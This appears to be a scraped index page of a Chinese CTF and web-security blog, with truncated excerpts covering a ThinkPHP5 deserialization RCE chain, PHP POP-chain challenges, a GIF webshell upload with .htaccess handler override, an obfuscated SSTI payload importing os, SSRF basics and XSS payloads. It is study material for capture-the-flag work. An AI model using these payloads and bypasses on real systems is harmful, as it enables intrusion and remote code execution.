ThinkPHP5反序列化漏洞复现
一、ThinkPHP5.1.x反序列化链
1234Window对象__destruct ->removefiles()的file_exists(Pivot对象)->conversion对象的__tostring->toJson()->toArray()->[$relation->visible($name)#传入request对象调用__call方法]->call_user_func_array控制hook变量去访问isAjax函数->param函数->input函数(参数可控)->filtervalue函数->call_user_func完全可控RCE
poc:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748<?phpnamespace think;abstract class Model{ protected $append = []; private $dat ...
SCTF-web
SCTF-web扫目录得到robots.txt
12345678910111213User-agent: *Disallow: /issues/ganttDisallow: /issues/calendarDisallow: /activityDisallow: /searchDisallow: /issues?sort=Disallow: /issues?query_id=Disallow: /issues?*set_filter=Disallow: /issues/*.pdf$Disallow: /projects/*.pdf$Disallow: /loginDisallow: /account/registerDisallow: /account/lost_password
admin admin123456
2024长城杯
2024长城杯-wp
WEBsqlup先fuzz一波
过滤了–+,#,select,and ,or
输入admin 1进去了???(源代码的fuzzy matching实际上是用%%密码登录
点击头像有文件上传的点
过滤了字母p,导致无法上传.php文件,尝试了一下可以上传正常的gif文件
所以可以做一个gif的图片马
上传之后我们打开图片链接,就可以拿到图片的目录了
http://eci-2ze5wzpsckex64sy7i6f.cloudeci1.ichunqiu.com/uploads/2.gif
有了图片马该如何利用呢?想到了.htaccess文件可以更改文件的解析
我们上传一个.htaccess文件:SetHandler application/x-httpd-php
这样所有的文件都会当做php代码来解析
(蚁剑无法打开/flag文件,需要用tac指令显示!)
candyshop[未解出]{‘csrf_token’: ‘04d9a3ecee8267e5ce21f9377e99fd425144aa5f’, ‘identity’: ‘guest’, ‘ ...
'BaseCTF-web-wp'
BaseCTF-web[Week2] ez_ser源代码+poc
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263<?phphighlight_file(__FILE__);error_reporting(0);class re{ public $chu0; public function __toString(){ if(!isset($this->chu0)){ return "I can not believes!"; } $this->chu0->$nononono;#3 chu0=new pwn() }}class web {#5 public $kw; public $dt; pu ...
'ssti'
ssti刷题1.dasctf8月 Truemanflask模版注入,4有注入点
过滤了. _ \ [ ] "和各种关键字
https://github.com/Marven11/Fenjing这个工具可以直接绕过waff
生成的payload为
1{%set hd='OS'|lower%}{%set rz=lipsum|escape|batch(22)|first|last%}{%set gl=rz*2~'g''lobals'~rz*2%}{%set ge=rz*2~'g''etitem'~rz*2%}{%set bu=rz*2~'builtins'~rz*2%}{%set im=rz*2~'import'~rz*2%}{{(((((cycler|attr('next')|attr ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment
ssrf漏洞
SSRF漏洞一.前置知识NATSSRF:service side request forgery服务器请求伪造
NAT: Network Address Transition 网络地址转换
静态NAT地址转换:内网转化为公网ip
NAT端口映射:通过防火墙NAT可以实现把私网ip端口映射到公网ip端口访问
curl函数三件套
curl_init:初始化一个Curl会话,里面一般是放URL地址,也可以放在curl_setopt里面的选项内
curl_setopt:设置curl会话的选项,比如CURLOPT_HEADER, 0表示将头文件的信息作为数据流输出
CURLOPT_RETURNTRANSFER,1将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
curl_exec:执行curl会话
curl_close:关闭curl会话
二.SSRF漏洞原理SSRF:service side request forgery服务器请求伪造
攻击目标是从外网无法访问的内部系统
形成原因:服务端提供了从服务器其他应用获取数据的功能
攻击方式:
三.伪协议信息搜集s ...
7.15刷题
7.15刷题[MRCTF2020]Ezpop1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95//And Crack It!class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);#1 $var=p ...
7.13刷题
7.13刷题[NewStarCTF 公开赛赛道]UnserializeOne12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758<?phperror_reporting(0);highlight_file(__FILE__);#Something useful for you : https://zhuanlan.zhihu.com/p/377676274class Start{ public $name; protected $func; public function __destruct()#12当一个对象被销毁时,__destruct() 方法会被调用 { echo "Welcome to NewStarCTF, ".$this->name;#11__toString() 方法会被自动调用 } public ...
XSS漏洞
XSS跨站脚本攻击漏洞一、常见触发标签无过滤情况1.<script><scirpt>alert("xss");</script>
2.<img>当图片加载错误时触发
<img src="x" onerror=alert(1)><img src="1" onerror=eval("alert('xss')")>
还可以改成onmouseover=”alert(1)” onmouseout=”alert(1)”
3.<a>123456<a href="https://www.qq.com">qq</a><a href=javascript:alert('xss')>test</a> 不是触发性的动作需要加前缀javascript:<a href="javascript:a" onm ...